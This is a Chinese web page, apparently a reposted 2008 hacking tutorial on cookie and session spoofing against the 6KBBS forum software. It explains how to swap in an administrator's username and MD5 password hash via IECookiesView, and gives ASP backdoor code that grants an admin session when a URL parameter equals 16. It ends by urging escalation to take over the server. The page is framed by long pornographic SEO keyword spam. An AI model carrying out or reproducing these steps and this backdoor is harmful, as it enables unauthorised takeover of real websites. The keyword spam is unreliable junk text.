国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

實例講解Cookies欺騙與session欺騙入侵
2008-06-18   

cookies欺騙,就是在只對用戶做cookies驗證的系統中,通過修改cookies的內容來得到相應的用戶權限登錄。

那么什么是cookies呢,我這里給大家一個專業的解釋,cookies是一個儲存于瀏覽器目錄中的文本文件,記錄你訪問一個特定站點的信息,且只能被創建這個cookies的站點讀回,約由255個字符組成,僅占4kb硬盤空間。當用戶正在瀏覽某站點時,它儲存于用戶機的隨機存取存儲器ram中,退出瀏覽器后,它儲存于用戶的硬盤中。儲存在cookies中的大部分信息是普通的,如當你瀏覽一個站點時,此文件記錄了每一次的擊鍵信息和被訪站點的地址等。但是許多web站點使用cookies來儲存針對私人的數據,如:注冊口令、用戶名、信用卡編號等。

什么是Session?當一個訪問者來到你的網站的時候一個Session就開始了,當他離開的時候Session就結束了。本質是來說,cookie是和瀏覽器有關系,而Session變量就可以存一些資源變量在服務器上面。

我們先里看個實例,在6KBBS的login.asp找到113—124行,得到以下代碼:

if 
[url=javascript:][color=#949494]Copy code[/color][/url]
login=false then tl=" 登 陸 失 敗" mes=mes&" 
 
·返回重新填寫" else response.cookies(prefix)("lgname") 
 
=lgname session(prefix"lgname")= 
 
lgname response.cookies(prefix)("lgpwd")= 
 
lgpwd response.cookies(prefix)("lgtype")= 
 
lgtype response.cookies(prefix)("lgcook")= 
 
cook if cook>0 then response.cookies(prefix).expires= 
 
date+cook end if 

我們來分析下,如果你登錄失敗了他就顯示你登錄失敗并引導你返回上一頁,否則就給你寫進cookies里面,如果你的cookies有的話那么你的過期時間就是你cookies的過期時間——也就是你保存cookies的時間了。 網管u家u.bitsCN.com

這時,我們想到的是如果里面的信息是admin的,那一不就成了以管理員登陸了嗎? 網管u家u.bitsCN.com

首先,我們先去注冊一個用戶,然后登錄,有個cookies保存的選項,一定要選哦。我選擇是保存一個月,因為保存了才會再你本機上寫進它的cookies。接著,打開數據庫,看admin表里面有什么東西,別的不管,你只要那個bd為16的那個人就行了。有可能沒有,你可以到他們論壇去逛一下,看管理員是誰,然后在數據庫里面拿他的賬號和加密的密碼來欺騙。

打開iecookiesview,這款軟件是拿來察看和修改本機的cookies的,很方便我們的cookies欺騙入侵。

在iecookiesview 里找到你要欺騙的那個網站,看到了嗎?有你的用戶名和md5加密的密碼,我們吧這兩項改為管理員的,就是把剛才數據庫里面的管理員賬號和md5加密的密碼代替你自己的。點擊“更改cookies”,打開一個新的ie,然后再去訪問那個論壇,看到沒有?你現在已經是管理員了。

接著,麻煩的事出現了,后臺登陸并不是以cookies來實現的,而是以session實現的 ,所以我們同樣來欺騙session;

首先簡單說一下一般asp系統的身份驗證原理。 一般來說,后臺管理員在登錄頁面輸入賬號密碼后,程序會拿著他提交的用戶名密碼去數據庫的管理員表里面找,如果有這個人的賬號密碼就認為你是管理員,然后給你一個表示你身份的session值?;蛘叱绦蛳劝涯愕挠脩裘艽a提取出來,然后到數據庫的管理員表里面取出管理員的賬號密碼來和你提交的相比較,如果相等,就跟上面一樣給你個表示你身份的sesion值。然后你進入任何一個管理頁面它都要首先驗證你的session值,如果是管理員就讓你通過,不是的話就引導你回到登錄頁面。

找到manage/admin.asp,發現驗證內容為:

[url=javascript:][color=#949494]Copy code[/color][/url]
... 
else  
 rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")  
 rs("LastLoginTime")=now()  
 rs("LoginTimes")=rs("LoginTimes")+1  
 rs.update  
 session.Timeout=SessionTimeout  
 session("AdminName")=rs("username")  
 rs.close  
 set rs=nothing  
 call CloseConn()  

Response.Redirect "Admin_Index.asp" 很容易就知道如果沒有獲得驗證就會出現兩個session值:

[url=javascript:][color=#949494]Copy code[/color][/url]
session.Timeout=SessionTimeout  

session("AdminName")=rs("username") 試想如果我們以adminName的信息登陸就就ok了..接著用ASP木馬編輯器來添加代碼如下:

[url=javascript:][color=#949494]Copy code[/color][/url]
dim id  
id=trim(request("hc"))  
if id="16" then  
 session("AdminName")="admin"   

end if 分析上段代碼,有個不定值--admin,可以根據實際情況來設置,不一定是admin;可以在一些不常去的頁面來登陸,如:FriendSite.asp?hc=16返回時頁面沒有出現異樣,這就行了,然后再次登陸manage/admin.asp,你會發現,你已經進入后臺了。然后可以提權得弄服務器了。


熱詞搜索:

上一篇:拒絕成為肉雞 教你幾招讓黑客永遠抓不到你
下一篇:網絡端口安全防護技巧 網絡安全從根抓起

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲精品成人悠悠色影视| 国产精品麻豆久久久| 色天使色偷偷av一区二区| 国产成人亚洲综合色影视| 首页亚洲欧美制服丝腿| 亚洲一区二区中文在线| 一区二区三区四区国产精品| 一区二区三区免费观看| 一区二区三区.www| 亚洲第一综合色| 日韩国产一区二| 久久er99热精品一区二区| 国内精品久久久久影院色| 国产激情视频一区二区在线观看| 丁香激情综合五月| 91蝌蚪porny成人天涯| 欧洲一区在线电影| 日韩免费福利电影在线观看| 久久久噜噜噜久久中文字幕色伊伊 | 综合久久给合久久狠狠狠97色 | 亚洲综合色婷婷| 日韩av一级片| 国产在线日韩欧美| 99国产欧美久久久精品| 6080日韩午夜伦伦午夜伦| 2023国产一二三区日本精品2022| 中文乱码免费一区二区| 亚洲成a人片综合在线| 久久99国产精品久久| 成人丝袜高跟foot| 欧美偷拍一区二区| 国产欧美日韩综合| 亚洲一区二区在线免费看| 狠狠v欧美v日韩v亚洲ⅴ| 成人激情免费网站| 91精品国产综合久久精品图片| 久久女同性恋中文字幕| 一区二区三区在线影院| 国产一区二区三区四区五区入口| 日本道色综合久久| 欧美精品一区二区在线播放 | 日韩精品专区在线影院观看| ●精品国产综合乱码久久久久| 香蕉久久一区二区不卡无毒影院 | 久久国产精品露脸对白| 91久久免费观看| 国产欧美日韩视频在线观看| 日韩中文字幕一区二区三区| 99综合电影在线视频| 日韩一区二区免费电影| 一区二区国产视频| av中文字幕一区| 国产日韩av一区二区| 久久国产综合精品| 欧美日韩成人激情| 一区二区三区欧美在线观看| 丁香婷婷综合五月| 精品88久久久久88久久久| 亚洲国产另类精品专区| 成人免费精品视频| 欧美国产日韩在线观看| 国产在线观看一区二区| 日韩欧美一二区| 免费观看在线综合| 91精品欧美一区二区三区综合在 | 成人午夜大片免费观看| 久久亚洲精品小早川怜子| 视频一区中文字幕| 欧美精品一二三四| 亚洲国产精品天堂| 欧美日本视频在线| 视频在线观看91| 欧美一区三区二区| 欧美bbbbb| 欧美刺激脚交jootjob| 欧美96一区二区免费视频| 在线播放日韩导航| 日本视频中文字幕一区二区三区| 欧美日韩一卡二卡三卡| 亚洲成人在线网站| 日韩色视频在线观看| 久久精品久久精品| 久久久www成人免费无遮挡大片| 国产美女精品在线| 国产日韩欧美高清| 91麻豆精品在线观看| 亚洲中国最大av网站| 欧美精品aⅴ在线视频| 蜜臀av性久久久久蜜臀aⅴ流畅| 日韩欧美一区电影| 国产aⅴ综合色| 亚洲另类春色校园小说| 欧美一区二区三区日韩| 国产曰批免费观看久久久| 国产精品欧美一级免费| 欧美自拍丝袜亚洲| 青青草97国产精品免费观看无弹窗版| 精品国产一区二区三区av性色 | 理论电影国产精品| 国产精品久久久久久久久免费丝袜 | 国产高清精品网站| 一区二区在线观看av| 欧美日韩高清一区二区三区| 久久国产麻豆精品| 亚洲激情自拍视频| 日韩精品资源二区在线| av在线不卡网| 日韩中文字幕av电影| 久久久久久久精| 欧美日韩视频一区二区| 国产精品自拍一区| 亚洲1区2区3区4区| 久久久久99精品国产片| 欧美日韩亚洲综合一区二区三区| 国产精品一卡二| 亚洲最大成人网4388xx| 精品国产精品一区二区夜夜嗨| 99热这里都是精品| 激情文学综合插| 亚洲动漫第一页| 国产精品美女久久久久久久久| 欧美剧情片在线观看| av影院午夜一区| 久久99日本精品| 五月婷婷综合网| 亚洲黄色性网站| 国产精品乱人伦一区二区| 精品久久久久一区二区国产| 在线中文字幕一区二区| av一区二区久久| 国产成人午夜片在线观看高清观看| 午夜激情综合网| 亚洲一区影音先锋| 一区二区三区四区中文字幕| 国产精品人人做人人爽人人添| 精品人在线二区三区| 欧美日韩国产小视频在线观看| 91麻豆国产精品久久| av毛片久久久久**hd| 成人深夜福利app| 丁香婷婷综合色啪| 国产精品自拍三区| 国产成人精品网址| 国产精品白丝jk白祙喷水网站| 久久精品国产亚洲高清剧情介绍 | 精品美女一区二区三区| 欧美精品在欧美一区二区少妇| 在线观看国产精品网站| 日本精品裸体写真集在线观看 | 日韩一级欧美一级| 欧美日韩大陆在线| 欧美日韩国产首页| 91精品国产91久久久久久最新毛片| 欧美乱妇20p| 日韩欧美一区中文| 精品国产一区二区在线观看| 精品国产91久久久久久久妲己 | 夜夜揉揉日日人人青青一国产精品| 亚洲欧美成aⅴ人在线观看| 亚洲欧美自拍偷拍色图| 最新久久zyz资源站| 一区二区在线看| 亚洲国产综合色| 日本不卡免费在线视频| 国产一区二区在线看| 成人av电影在线观看| 91在线码无精品| 精品视频在线免费看| 日韩免费看的电影| 国产精品乱人伦| 亚洲国产成人tv| 韩国成人福利片在线播放| 不卡免费追剧大全电视剧网站| 91首页免费视频| 91麻豆精品91久久久久同性| 久久久99精品免费观看不卡| 日韩毛片在线免费观看| 天天av天天翘天天综合网色鬼国产| 视频一区国产视频| 国产在线不卡一区| 在线观看欧美精品| 精品福利在线导航| 综合分类小说区另类春色亚洲小说欧美 | 国产精品色噜噜| 尤物视频一区二区| 另类小说图片综合网| 不卡av在线网| 日韩写真欧美这视频| 国产精品剧情在线亚洲| 日韩1区2区3区| 99r精品视频| 久久久国产综合精品女国产盗摄| 亚洲激情图片qvod| 国产福利91精品| 日韩一区二区三区四区五区六区| 中文乱码免费一区二区| 日韩综合小视频| 在线亚洲免费视频| 国产精品免费av| 激情五月婷婷综合|